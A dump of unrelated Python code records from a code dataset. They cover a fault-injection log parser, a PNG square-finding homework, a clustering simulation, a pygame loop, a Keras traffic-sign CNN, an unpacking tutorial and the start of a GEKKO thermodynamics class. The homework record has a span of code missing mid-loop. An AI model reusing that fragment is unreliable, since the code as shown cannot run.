\"w\")\n\n for item in hangsVarDic:\n hangLogFile.write(\"%s[%s:%d]: %s\\n\" %(result.hangList[item[0]].varName, result.hangList[item[0]].decFile, result.hangList[item[0]].decLine, item[1]))\n\n for item in sdcVarDic:\n sdcLogFile.write(\"%s[%s:%d]: %s\\n\" %(result.sdcList[item[0]].varName, result.sdcList[item[0]].decFile, result.sdcList[item[0]].decLine, item[1]))\n\n sdcLogFile.close()\n hangLogFile.close()\n\ndef listTimeVulnerability(result):\n \"\"\"\n Creates log with number of hangs and SDCs over time\n \"\"\"\n hangLogPath = \"/home/andre/ufrgs/ftf/hangTimeVulnerability.log\"\n sdcLogPath = \"/home/andre/ufrgs/ftf/sdcTimeVulnerability.log\"\n hangList = result.hangList\n sdcList = result.sdcList\n timeStep = 1\n\n hangList = sorted(hangList, key=lambda x: x.time)\n sdcList = sorted(sdcList, key=lambda x: x.time)\n hangFile = open(hangLogPath, \"w\")\n sdcFile = open(sdcLogPath, \"w\")\n\n for timeSlot in range(timeStep, 40, timeStep):\n hangCount = 0\n sdcCount = 0\n for item in hangList:\n if (item.time > timeSlot-timeStep) and (item.time <= timeSlot):\n hangCount += 1\n\n for item in sdcList:\n if (item.time > timeSlot-timeStep) and (item.time <= timeSlot):\n sdcCount += 1\n\n hangFile.write(\"%d - %d: %d\\n\" %(timeSlot-timeStep, timeSlot, hangCount))\n sdcFile.write(\"%d - %d: %d\\n\" %(timeSlot-timeStep, timeSlot, sdcCount))\n\n hangFile.close()\n sdcFile.close()\n\n#-------------------------------------------------------------------------------\ndef sdcCriticality(dirPath):\n \"\"\"\n Compares the number data lines between gold and corrupted outputs\n Return values: -1 = Error, 0 = Not critical, >0 = How critical\n\n gold file has a total of 222082 lines, 294 of which have no data in them.\n The total number of useful lines is 221788\n \"\"\"\n\n faultyFileLines = 0\n faultyFileName = \"outputFile\"\n goldFileLines = 221788\n\n faultyContent = open(dirPath+\"/\"+faultyFileName, \"r\").readlines()\n count = 0\n for line in faultyContent:\n # Counts the number of useful lines\n if re.search(\"New Iteration*\", line):\n count += 1\n\n faultyFileLines = len(faultyContent) - count\n absDifference = abs(goldFileLines - faultyFileLines)\n # Percentage difference\n perDifference = (float(absDifference)/float(goldFileLines)) * 100.0\n return(perDifference)\n\ndef handleLogDir(injList, hangDir, faultResult):\n\n sdcCount = 0\n\n for dateDir in os.listdir(hangDir):\n # Every date directory\n if not os.path.isdir(hangDir+dateDir):\n # Skip regular files\n continue\n for logDir in os.listdir(hangDir+dateDir):\n # Every injection directory\n # Finds the useful log file\n logFileList = os.listdir(hangDir + dateDir + \"/\" + logDir)\n fileIndex = findInList(logFileList, \"flipvalue\")\n if fileIndex != -1:\n # Reads data from file and appends new object to the result list\n logFile = open(hangDir + dateDir + \"/\" + logDir + \"/\" + logFileList[fileIndex], \"r\").readlines()\n injBuffer = readValuesFromLog(logFile, faultResult)\n # Performs application specific SDC criticality analysis\n if faultResult == \"sdc\":\n sdcCount += 1\n print(\"Avaluating SDC number %d criticality...\" %(sdcCount))\n # TODO: UNCOMENT\n # injBuffer.sdcCriticality = sdcCriticality(hangDir + dateDir + \"/\" + logDir)\n\n injList.append(injBuffer)\n\n return injList\n\ndef readValuesFromLog(fileContent, faultResult):\n \"\"\"\n Returns an Injection object containig the values read from the file\n \"\"\"\n # Initializes variables\n varName = \"\"\n varType = \"\"\n injectionLine = \"\"\n memContentBefore = \"\"\n newValue = \"\"\n faultModel = \"\"\n filename = \"\"\n funcName = \"\"\n time = \"\"\n # Reads every line in the file\n for line in fileContent:\n # Extracts data from each line\n if re.search(\"^Fault Model:.*\", line):\n # Fault Model: Random bit-flip\n faultModel = re.search(\"(?<=^Fault Model:).*\", line).group().lstrip()\n\n elif re.search(\"^#0.+:\\d+\", line):\n # Injection line and file name\n # #0 0x0000000000400ff0 in updatePositions (elapsedTime_uSec=100000) at collisionDetection.c:106\n filename = re.search(\"(?<=\\) at )[a-zA-Z0-9_\\.]+\", line).group().lstrip()\n injectionLine = re.search(\"(?<=:)[0-9]+\", line).group().lstrip()\n\n elif re.search(\"^Memory content before bitflip:.*\", line):\n # Memory content before bitflip:0x9a0x990x990x990x990x990xb90x3f\n memContentBefore = re.search(\"(?<=Memory content before bitflip:)[0-9xa-fA-F]+\", line).group().lstrip()\n\n elif re.search(\"^frame name:.*\", line):\n # Function name\n # frame name: updatePositions\n funcName = re.search(\"(?<=^frame name:).*\", line).group().lstrip()\n\n elif re.search(\"^symbol name:.*\", line):\n # symbol name: elapsedTime_Sec\n varName = re.search(\"(?<=^symbol name:).*\", line).group().lstrip()\n\n elif re.search(\"^value:.*\", line):\n # Value after bitflip\n # value: 1.3269862909504584e+89\n newValue = re.search(\"(?<=^value:).*\", line).group().lstrip()\n\n elif re.search(\"^Type:.*\", line):\n # Variable type\n # Type: A floating point type.\n varType = re.search(\"(?<=^Type:).*\", line).group().lstrip()\n\n elif re.search(\"^Fault.*\", line):\n # Injection time\n # Fault Injection Successful after 2.5929765701293945s\n time = re.search(\"(?<=^Fault Injection Successful after).*(?=s)\", line).group().lstrip()\n time = float(time)\n\n elif re.search(\"^symbol line.*\", line):\n # Variable declaration line\n # symbol line: 9\n decLine = re.search(\"(?<=^symbol line:).*\", line).group().lstrip()\n decLine = int(decLine)\n\n elif re.search(\"^symbol filename.*\", line):\n # Variable declaration file\n # symbol filename: collisionDetection.c\n decFile = re.search(\"(?<=^symbol filename:).*\", line).group().lstrip()\n\n injectionBuf = Injection(varName, varType, injectionLine, memContentBefore, newValue, faultModel, filename, funcName, faultResult, -1, time, decLine, decFile)\n return injectionBuf\n\ndef findInList(listVar, content):\n \"\"\"\n Returns index to searched element, or -1 if not found\n \"\"\"\n\n for index, element in enumerate(listVar):\n if isinstance(element, str):\n if element.find(content) != -1:\n return index\n\n return -1\n\ndef printList(listVar):\n \"\"\"\n Prints all the elements in a list\n \"\"\"\n\n for element in listVar:\n print(element)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"original/readLogs.py","file_name":"readLogs.py","file_ext":"py","file_size_in_byte":14497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"47542276","text":"'''\r\nAbbiamo immagini in formato png ottenute inserendo su di uno sfondo monocolore rettangoli \r\ndi vari colori i cui assi sono sempre parallei agli assi dell'immagine.\r\n\r\nVedi ad esempio l'immagine Img1.png\r\n\r\nPer caricare e salvare immagini PNG usate le funzioni load e save che abbiamo preparato nel modulo immagini.py .\r\n\r\nScrivere una funzione quadrato(filename, C) che prende in input:\r\n- il percorso di un file (filename) che contine un immagine in formato png della tipologia appena descritta.\r\n- una tupla C che rappresenta un colore in formato RGB (3 valori interi tra 0 e 255 compresi)\r\n\r\nLa funzione deve restituire nell'ordine:\r\n- la lunghezza del lato del quadrato pieno di dimensione massima e colore C interamente visibile nell'immagine. \r\n- le coordinate (x,y) del pixel dell'immagine che corrisponde alla posizione \r\nall'interno dell'immagine del punto in alto a sinistra del quadrato. \r\n\r\nIn caso ci siano più quadrati di dimensione massima, va considerato quello il cui punto \r\nin alto a sinistra occupa la riga minima (e a parita' di riga la colonna minima) all'interno dell' immagine. \r\n\r\nSi può assumere che nell'immagine e' sempre presente almeno un pixel del colore cercato.\r\n\r\nPer gli esempi vedere il file grade01.txt\r\n\r\nATTENZIONE: Il timeout è impostato a 10*N secondi (con N numero di test del grader).\r\n'''\r\n\r\nfrom immagini import png\r\n\r\ndef quadrato(filename,c):\r\n imglist=load(filename)\r\n return scorri(imglist,c)\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\ndef scorri(imglist,c):\r\n k=0\r\n y=0\r\n x=0\r\n coord=[0,0]\r\n lun=0\r\n luny=len(imglist)\r\n lunx=len(imglist[y])\r\n h=[0,[0,0],0]\r\n while ylun and pieno(y,x,y1,x1,imglist,c)==True :\r\n return lun1,[y,x],x1\r\n else:\r\n return lun,coord,x\r\n \r\n \r\n \r\n\r\n\r\n\r\ndef pieno(y,x,y1,x1,imglist,c): #devo mettere che trovando un elemento non c termina immediatamente\r\n a=y\r\n b=x\r\n while a<=y1:\r\n b=x\r\n while b<=x1:\r\n if imglist[a][b]!=c:\r\n return False\r\n \r\n\r\n b+=1\r\n \r\n a+=1\r\n return True\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef load(fname):\r\n with open(fname, mode='rb') as f:\r\n reader = png.Reader(file=f)\r\n w, h, png_img, _ = reader.asRGB8()\r\n img = []\r\n for line in png_img:\r\n l = []\r\n for i in range(0, len(line), 3):\r\n l+=[(line[i], line[i+1], line[i+2])]\r\n img+=[l]\r\n return img\r\n","sub_path":"students/1818290/homework03/program01.py","file_name":"program01.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"278409349","text":"###Simulation\r\n##Cluster overlap in 2D\r\n\r\n#Import librarties\r\nfrom sklearn.datasets.samples_generator import make_blobs\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.mixture import GaussianMixture\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport numpy as np\r\nimport random\r\nfrom sklearn import metrics\r\nfrom random import randint\r\n\r\n\r\n#Define purity function (ie. how many points were correctly \"clustered\")\r\ndef purity(y_true, y_pred):\r\n # compute contingency matrix (also called confusion matrix)\r\n contingency_matrix = metrics.cluster.contingency_matrix(y_true, y_pred)\r\n # return purity\r\n return np.sum(np.amax(contingency_matrix, axis=0)) / np.sum(contingency_matrix) \r\n\r\n\r\n \r\n#Matrices for the purity scores\r\nFrameK = np.empty((0,90))\r\nFrameM1 = np.empty((0,90))\r\nFrameM2 = np.empty((0,90))\r\nFrameM3 = np.empty((0,90))\r\nFrameM4 = np.empty((0,90))\r\n\r\n#Set seed to replicate results\r\nrandom.seed(1)\r\n\r\n#Create a loop to get the average performance of the method\r\nfor j in range(0,10):\r\n print(\"Progress: \", j)\r\n #Vectors/lists for the purity score of one round\r\n purityK=[]\r\n purityM1=[]\r\n purityM2=[]\r\n purityM3=[]\r\n purityM4=[]\r\n\r\n obs=[]\r\n i=1\r\n\r\n #Random state for creating the Gaussian set\r\n omegarand=random.uniform(0.01,0.05)\r\n rand=randint(0, 10)\r\n #Random state for \"stretching\" the data set\r\n rng = np.random.RandomState(74)\r\n \r\n while(i<=9):\r\n print(\"Progress: \", j, i)\r\n\r\n \r\n obs.append(i)\r\n \r\n \r\n X, y = make_blobs(n_samples=10000, centers=4, n_features=2,\r\n random_state=rand,cluster_std=i,shuffle=True)\r\n \r\n \r\n \r\n # transform the data to be stretched\r\n #transformation = rng.normal(size=(i, i))\r\n \r\n #if rand%2==0:\r\n # X = np.dot(X, transformation)\r\n\r\n \r\n #K-means\r\n\r\n kmeans = KMeans(4, random_state=0,max_iter=10000,init='random')\r\n klabels = kmeans.fit(X).predict(X)\r\n \r\n # Mixtures\r\n \r\n #gmm1=mclust.Mclust(X,verbose=\"FALSE\",modelNames=\"VVI\")\r\n #gmm2=mclust.Mclust(X,verbose=\"FALSE\",modelNames=\"EEI\")\r\n #gmm3=mclust.Mclust(X,verbose=\"FALSE\",modelNames=\"EVI\")\r\n \r\n gmm1 = GaussianMixture(4,random_state=0,max_iter=10000,\r\n init_params='kmeans',covariance_type='full')\r\n \r\n gmm2 = GaussianMixture(4,random_state=0,max_iter=10000,\r\n init_params='kmeans',covariance_type='diag')\r\n \r\n gmm3 = GaussianMixture(4,random_state=0,max_iter=10000,\r\n init_params='kmeans',covariance_type='tied')\r\n \r\n gmm4 = GaussianMixture(4,random_state=0,max_iter=10000,\r\n init_params='kmeans',covariance_type='spherical')\r\n \r\n m1labels = gmm1.fit(X).predict(X)\r\n m2labels = gmm2.fit(X).predict(X)\r\n m3labels = gmm3.fit(X).predict(X)\r\n m4labels = gmm4.fit(X).predict(X)\r\n \r\n \r\n purityK.append(purity(y, klabels))\r\n purityM1.append(purity(y, m1labels))\r\n purityM2.append(purity(y, m2labels))\r\n purityM3.append(purity(y, m3labels))\r\n purityM4.append(purity(y, m4labels))\r\n \r\n\r\n i=i+0.1\r\n\r\n \r\n FrameK=np.append(FrameK,[purityK],axis=0)\r\n FrameM1=np.append(FrameM1,[purityM1],axis=0) \r\n FrameM2=np.append(FrameM2,[purityM2],axis=0) \r\n FrameM3=np.append(FrameM3,[purityM3],axis=0) \r\n FrameM4=np.append(FrameM4,[purityM4],axis=0) \r\n\r\n\r\n\r\n###Draw the damn pictures\r\nmeanK=np.mean(FrameK,axis=0)\r\nmeanM1=np.mean(FrameM1,axis=0)\r\nmeanM2=np.mean(FrameM2,axis=0)\r\nmeanM3=np.mean(FrameM3,axis=0)\r\nmeanM4=np.mean(FrameM4,axis=0)\r\n \r\n\r\nplt.plot(obs,meanK,'b',\r\n obs,meanM1,'r',\r\n obs,meanM2,'m',\r\n obs,meanM3,'c',\r\n obs,meanM4,'g' )\r\n\r\nplt.ylim(0.2,1.05)\r\n\r\nplt.legend(['K-means','Full','Diag','Tied','Spherical'])\r\n\r\nplt.xlabel('Cluster sd')\r\nplt.ylabel('Purity score')\r\nplt.title('Increasing overlap')\r\n\r\nplt.show()\r\n\r\n\r\n\r\n","sub_path":"SimulationOverlap.py","file_name":"SimulationOverlap.py","file_ext":"py","file_size_in_byte":4114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"610790794","text":"import pygame as py\r\nimport random as rand\r\nimport time\r\n\r\nimport entity as ent\r\nimport component as comp\r\nimport systems\r\n\r\nWIDTH = 640\r\nHEIGHT = 480\r\n\r\n#SETUP WINDOW, CLOCK, AND ECS MANAGER\r\npy.init()\r\nwindow = py.display.set_mode((WIDTH, HEIGHT))\r\nclock = py.time.Clock()\r\nmanager = systems.Manager(window, clock)\r\n\r\nrand.seed(int(round(time.time() * 1000)))\r\n\r\n#LIST OF ACTIVE ENTITIES\r\nentities = []\r\n\r\n#PLAYER ENTITY\r\nx = 100\r\ny = 100\r\nplayer = ent.Entity()\r\nplayer.addComponents([comp.position(x, y),\r\n\t\t\t\t\t\tcomp.sheet(\"assets/sprites/Player/Individual/STILLF.png\", 1, 5),\r\n\t\t\t\t\t\tcomp.input(), comp.speed(2), comp.velocity(), comp.aabb(x, y, 32, 32), comp.accel()])\r\n#ADD PLAYER TO LIST\r\nentities.append(player)\r\n\r\n#ADD ZOMBIES\r\nfor z in range(100):\r\n\trw = rand.randint(0, WIDTH)\r\n\trh = rand.randint(0, HEIGHT)\r\n\r\n\t#Create zombie object\r\n\tzombie = ent.Entity()\r\n\tzombie.addComponents([comp.position(rw, rh),\r\n\t\t\t\t\t\tcomp.sprite(\"assets/shadow_wraith.png\"),\r\n\t\t\t\t\t\tcomp.input(), comp.speed(3), comp.velocity(), comp.aabb(rw, rh, 32, 32), comp.accel()])\r\n\t#Add zombie to list\r\n\tentities.append(zombie)\r\n\r\n#FPS COUNTER\r\nfps_font = py.font.Font(py.font.get_default_font(), 20)\r\ncurrent_frame, last_frame = 0, 0\r\n\r\n#MAIN LOOP\r\nrun = True\r\nwhile run:\r\n\tif py.key.get_pressed()[py.K_UP]:\r\n\t\tmanager.chosenOne += 1\r\n\telif py.key.get_pressed()[py.K_DOWN]:\r\n\t\tmanager.chosenOne -= 1\r\n\tif manager.chosenOne < 0:\r\n\t\tmanager.chosenOne = 0\r\n\t#CALL THE SYSTEMS \r\n\tmanager.input(entities)\r\n\tmanager.movement(entities)\r\n\tmanager.aabb(entities)\r\n\tmanager.draw(entities)\r\n\r\n\t#FPS CALCULATION\r\n\tlast_frame = current_frame\r\n\tcurrent_frame = py.time.get_ticks()\r\n\tfps = 1000 // (current_frame - last_frame)\r\n\tfps_surf = fps_font.render(str(fps), False, (255, 255, 255), (0,0,0,0))\r\n\twindow.blit(fps_surf, (10,10))\r\n\r\n\t#UPDATE WINDOW\r\n\tpy.display.flip()\r\n\twindow.fill((50,50,50))\r\n\tclock.tick(65)\r\n\r\n\t#CHECK FOR EXIT\r\n\tfor event in py.event.get():\r\n\t\tif event.type == py.QUIT:\r\n\t\t\trun = False\r\n\r\nquit()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"192054784","text":"import random\nfrom PyQt5.QtWidgets import QSizePolicy\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.figure import Figure\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nclass PlotCanvas(FigureCanvas):\n\n def __init__(self, data, parent=None):\n\n fig = Figure(figsize=(6.5, 5), dpi=100)\n\n FigureCanvas.__init__(self, fig)\n self.setParent(parent)\n\n FigureCanvas.setSizePolicy(self, QSizePolicy.Expanding, QSizePolicy.Expanding)\n FigureCanvas.updateGeometry(self)\n\n self.plot_data(data)\n\n def plot_data(self, data):\n \n # подготовим данные\n\n plan_mean = [plan_value for plan_value in data['plan'].values()]\n real_mean = [real_expense_value for real_expense_value in data['real'].values()]\n labels = [expense_name for expense_name in data['real']]\n ind = np.arange(len(real_mean)) \n\n # создадим и настроим объект axes\n width = 0.35 # the width of the bars\n\n ax = self.figure.add_subplot(111)\n rects1 = ax.barh(ind - width/2, plan_mean, width,\n color='SkyBlue', label='План')\n rects2 = ax.barh(ind + width/2, real_mean, width,\n color='IndianRed', label='Реальность')\n\n ax.set_position([ 0.25, 0.15, 0.7, 0.70 ])\n # Add some text for labels, title and custom x-axis tick labels, etc.\n ax.set_xlabel('Рубли')\n ax.set_title('Планы и расходы')\n ax.set_yticks(ind)\n ax.set_yticklabels(labels, fontdict={'fontsize':8})\n ax.legend()\n ax.grid()\n self.draw()\n\n","sub_path":"for_view/matplot.py","file_name":"matplot.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"585358131","text":"import keras\nimport numpy as np\nfrom skimage import io, color, exposure, transform\nfrom sklearn.cross_validation import train_test_split\nimport os\nimport glob\nimport h5py\nimport pandas as pd\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential, model_from_json\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.layers.convolutional import Conv2D\nfrom keras.layers.pooling import MaxPooling2D\n\nfrom keras.optimizers import SGD\nfrom keras.utils import np_utils\nfrom keras.callbacks import LearningRateScheduler, ModelCheckpoint\nfrom keras import backend as K\nK.set_image_data_format('channels_first')\nfrom keras.callbacks import Callback\nimport os\nimport numpy as np\n\nfrom matplotlib import pyplot as plt\n# %matplotlib inline\n\n\nnp.random.seed(7)\nepochs = 100\nbatch_size = 128\nsave_dir = os.path.join(os.getcwd(), 'saved_models/gtsd-1')\nmodel_name = 'gtsd_model.h5'\n\nNUM_CLASSES = 43\nIMG_SIZE = 48\n\n# Save model and weights\nif not os.path.isdir(save_dir):\n os.makedirs(save_dir)\n\nclass BatchWeightsSaver(Callback):\n def __init__(self, model, N):\n self.model = model\n self.N = N\n self.batch = 0\n\n def on_batch_end(self, batch, logs={}):\n if self.batch % self.N == 0:\n name = 'weights-batch%08d.h5' % self.batch\n self.model.save_weights(save_dir+\"/\"+name)\n self.batch += 1\n\nclass EpochWeightsSaver(Callback):\n def __init__(self, model, N):\n self.model = model\n self.N = N\n self.epoch = 0\n\n def on_epoch_end(self, epoch, logs={}):\n if self.epoch % self.N == 0:\n name = 'weights-epoch-%08d.h5' % self.epoch\n self.model.save_weights(save_dir+\"/\"+name)\n self.epoch += 1\n\n\ndef preprocess_img(img):\n # Histogram normalization in y\n hsv = color.rgb2hsv(img)\n hsv[:,:,2] = exposure.equalize_hist(hsv[:,:,2])\n img = color.hsv2rgb(hsv)\n\n # central scrop\n min_side = min(img.shape[:-1])\n centre = img.shape[0]//2, img.shape[1]//2\n img = img[centre[0]-min_side//2:centre[0]+min_side//2,\n centre[1]-min_side//2:centre[1]+min_side//2,\n :]\n\n # rescale to standard size\n img = transform.resize(img, (IMG_SIZE, IMG_SIZE))\n\n # roll color axis to axis 0\n img = np.rollaxis(img,-1)\n\n return img\n\n\ndef get_class(img_path):\n return int(img_path.split('/')[-2])\n\ntry:\n with h5py.File('X.h5') as hf: \n X, Y = hf['imgs'][:], hf['labels'][:]\n print(\"Loaded images from X.h5\")\n\nexcept (IOError,OSError, KeyError): \n print(\"Error in reading X.h5. Processing all images...\")\n root_dir = '/home/aref/datasets/GTSRB/Final_Training/Images/'\n imgs = []\n labels = []\n\n all_img_paths = glob.glob(os.path.join(root_dir, '*/*.ppm'))\n np.random.shuffle(all_img_paths)\n for img_path in all_img_paths:\n try:\n img = preprocess_img(io.imread(img_path))\n label = get_class(img_path)\n imgs.append(img)\n labels.append(label)\n\n if len(imgs)%1000 == 0: print(\"Processed {}/{}\".format(len(imgs), len(all_img_paths)))\n except (IOError, OSError):\n print('missed', img_path)\n pass\n\n X = np.array(imgs, dtype='float32')\n Y = np.eye(NUM_CLASSES, dtype='uint8')[labels]\n\n with h5py.File('X.h5','w') as hf:\n hf.create_dataset('imgs', data=X)\n hf.create_dataset('labels', data=Y)\n\ndef cnn_model():\n model = Sequential()\n\n model.add(Conv2D(32, (3, 3), padding='same',\n input_shape=(3, IMG_SIZE, IMG_SIZE),\n activation='relu'))\n model.add(Conv2D(32, (3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.2))\n\n model.add(Conv2D(64, (3, 3), padding='same',\n activation='relu'))\n model.add(Conv2D(64, (3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.2))\n\n model.add(Conv2D(128, (3, 3), padding='same',\n activation='relu'))\n model.add(Conv2D(128, (3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.2))\n\n model.add(Flatten())\n model.add(Dense(512, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(NUM_CLASSES, activation='softmax'))\n return model\n\ndef lr_schedule(epoch):\n return lr*(0.1**int(epoch/10))\n\nmodel = cnn_model()\n# let's train the model using SGD + momentum (how original).\nlr = 0.01\nsgd = SGD(lr=lr, decay=1e-6, momentum=0.9, nesterov=True)\nmodel.compile(loss='categorical_crossentropy',\n optimizer=sgd,\n metrics=['accuracy'])\n\nprint(model.summary())\n\ntest = pd.read_csv('/home/aref/datasets/GTSRB/GT-final_test.csv',sep=';')\nX_test = []\ny_test = []\nfor file_name, class_id in zip(list(test['Filename']), list(test['ClassId'])):\n img_path = os.path.join('/home/aref/datasets/GTSRB/Final_Test/Images/',file_name)\n X_test.append(preprocess_img(io.imread(img_path)))\n y_test.append(class_id)\n\nX_test = np.array(X_test)\ny_test = np.array(y_test)\ny_test = keras.utils.to_categorical(y_test, NUM_CLASSES)\n\nmodel.fit(X, Y,\n batch_size=batch_size,\n epochs=epochs,\n verbose=1,\n # validation_split=0.2,\n validation_data=(X_test,y_test),\n shuffle=True,\n callbacks=[LearningRateScheduler(lr_schedule),\n EpochWeightsSaver(model, 1)])\n\nmodel_path = os.path.join(save_dir, model_name)\nmodel.save(model_path)\nprint('Saved trained model at %s ' % model_path)\n\nscore = model.evaluate(X_test, y_test, verbose=0)\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])\n","sub_path":"python/gtsd-1.py","file_name":"gtsd-1.py","file_ext":"py","file_size_in_byte":5699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"565385141","text":"# se não tiver a mesma quantidade de parametros do que aqueles q existem vai dar erro.\n\nregistro = ('renzo',35)\nnome, idade = registro\nnome #retorna `renzo`\nregistro #retorna 35\n\nlista = ['luiz','joao','maria',1,2,3,4,5,6,7]\nn1,n2,n3,*outros,ultimo_da_lista = lista #usa asterisco para enviar um conjunto variavel de parametros para uma lista\nprint(n1,n2,n3,outros,ultimo_da_lista)\n\n\n #desempacotamento para passar um argumento\ndef listar_itens(w,x,y,z):\n print(w,x,y,z)\n\nlista = [12,32,43,55]\nlistar_itens(*lista) #vai desenpacotar para enviar cada valor da tupla como parametro\n\n #desenpactomento de tupla com um laço for\n\ntupla = (\"sator\",\"arepo\", \"tenet\",'opera','rotas')\nfor des, en, paco, ta, mento in tupla:\n print(des, en, paco, ta, mento)\n\nprint(\"----\\n\")\nstring= ('adfa')\nfor indice,elemento in enumerate(string):\n print(indice,elemento)\n\n#--------------------z-desenpacotamento-z com *args\n\ndef my_sum(*args):\n print(args) #*args recebe um numero variavel de parametros que são empacotados em uma tupla\n print(type(args)) #type tuple\n return sum(args) #função soma\n","sub_path":"1-Estruturas de dados/containers/z-desenpacotamento-z/desempacotamento.py","file_name":"desempacotamento.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"569672245","text":"from Tkinter import *\n\n\nroot = Tk()\ntext = Text(root)\ntext.insert(INSERT, \"Some example text.\\n Some second line of example text\")\n\ndef onclick(event):\n print(event.__class__)\n #event.widget.mark_set(INSERT, '1.0')\n event.widget.see(SEL)\n #print event.widget.get('linetwo', END)\n\n\n\ntext.bind('', onclick)\ntext.mark_set(\"linetwo\", '2.0')\ntext.tag_add(SEL, '1.0', END)\n#text.bind('', onclick)\n\ntext.pack()\n\n\nroot.mainloop()","sub_path":"Tour/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"201264835","text":"# -*- coding: utf-8 -*-\r\nfrom gekko import GEKKO\r\nimport numpy as np\r\nfrom .gk_parameter import GKParameter\r\nfrom .gk_variable import GKVariable\r\n\"\"\"\r\nGEKKO specializes in a optimization and control. This module extends GEKKO with \r\nchemical compounds, thermodynamic properties, and flowsheet objects.\r\n\"\"\"\r\n\r\nclass Properties():\r\n \r\n def __init__(self,m):\r\n self.m = m\r\n # True if thermo object is created\r\n # Enforces compound definition before thermo_obj definition\r\n self._thermo_obj = False\r\n \r\n def compound(self,name):\r\n \"\"\" Add chemical compound to model with one of the following:\r\n 1. IUPAC Name (1,2-ethanediol)\r\n 2. Common Name (ethylene glycol) \r\n 3. CAS Number (107-21-1)\r\n 4. Formula (C2H6O2)\r\n Repeated compounds are permitted. All compounds should be declared\r\n before thermo objects are created. An error message will occur if\r\n the compound is not in the database and a file 'compounds.txt' will\r\n be created to communicate the available compounds.\r\n \"\"\" \r\n #verify that compound is not added after thermo objects\r\n if self._thermo_obj:\r\n raise TypeError(\"Define compound (\"+name+\") before creating a thermo object\")\r\n # add compound name\r\n self.m._compounds.append(name)\r\n return\r\n \r\n def thermo(self,prop,T=300.0):\r\n \"\"\" Thermodynamic Properties\r\n usage: thermo('mw') for constants\r\n thermo('lvp',T) for temperature dependent\r\n ---- Temperature Independent ----\r\n mw = Molecular Weight (kg/kmol)\r\n tc = Critical Temperature (K)\r\n pc = Critical Pressure (Pa)\r\n vc = Critical Volume (m^3/kmol)\r\n ccf = Crit Compress Factor (unitless)\r\n mp = Melting Point (K)\r\n tpt = Triple Pt Temperature (K)\r\n tpp = Triple Pt Pressure (Pa)\r\n nbp = Normal Boiling Point (K)\r\n lmv = Liq Molar Volume (m^3/kmol)\r\n ighf = IG Heat of Formation (J/kmol)\r\n iggf = IG Gibbs of Formation (J/kmol)\r\n igae = IG Absolute Entropy (J/kmol*K)\r\n shf = Std Heat of Formation (J/kmol)\r\n sgf = Std Gibbs of Formation (J/kmol)\r\n sae = Std Absolute Entropy (J/kmol*K)\r\n hfmp = Heat Fusion at Melt Pt (J/kmol)\r\n snhc = Std Net Heat of Comb (J/kmol)\r\n af = Acentric Factor (unitless)\r\n rg = Radius of Gyration (m)\r\n sp = Solubility Parameter ((J/m^3)^0.5)\r\n dm = Dipole Moment (c*m)\r\n r = van der Waals Volume (m^3/kmol)\r\n q = van der Waals Area (m^2)\r\n ri = Refractive Index (unitless)\r\n fp = Flash Point (K)\r\n lfl = Lower Flammability Limit (K)\r\n ufl = Upper Flammability Limit (K)\r\n lflt = Lower Flamm Limit Temp (K)\r\n uflt = Upper Flamm Limit Temp (K)\r\n ait = Auto Ignition Temp (K)\r\n ---- Temperature Dependent ---- \r\n sd = Solid Density (kmol/m^3)\r\n ld = Liquid Density (kmol/m^3) \r\n svp = Solid Vapor Pressure (Pa) \r\n lvp = Liquid Vapor Pressure (Pa) \r\n hvap = Heat of Vaporization (J/kmol) \r\n scp = Solid Heat Capacity (J/kmol*K) \r\n lcp = Liquid Heat Capacity (J/kmol*K) \r\n igcp = Ideal Gas Heat Capacity (J/kmol*K) \r\n svc = Second Virial Coefficient (m^3/kmol) \r\n lv = Liquid Viscosity (Pa*s) \r\n vv = Vapor Viscosity (Pa*s) \r\n sk = Solid Thermal Conductivity (W/m*K) \r\n lk = Liq Thermal Conductivity (W/m*K) \r\n vk = Vap Thermal Conductivity (W/m*K) \r\n st = Surface Tension (N/m) \r\n sh = Solid Enthalpy (J/kmol) \r\n lh = Liq Enthalpy (J/kmol) \r\n vh = Vap Enthalpy (J/kmol) \r\n \"\"\"\r\n self._thermo_obj = True\r\n prop = prop.lower()\r\n \r\n # check if it is a temperature dependent property\r\n tdp = ['sd','ld','lv','vv','sk','lk','vk','st','sh','lh','vh',\\\r\n 'svp','lvp','scp','lcp','svc','hvap','igcp']\r\n if prop.lower() in tdp:\r\n td = True\r\n # inquire if T is a valid GEKKO variable or parameter\r\n if isinstance(T,(GKVariable,GKParameter)):\r\n Tin = T\r\n else:\r\n # create input variable if it is an 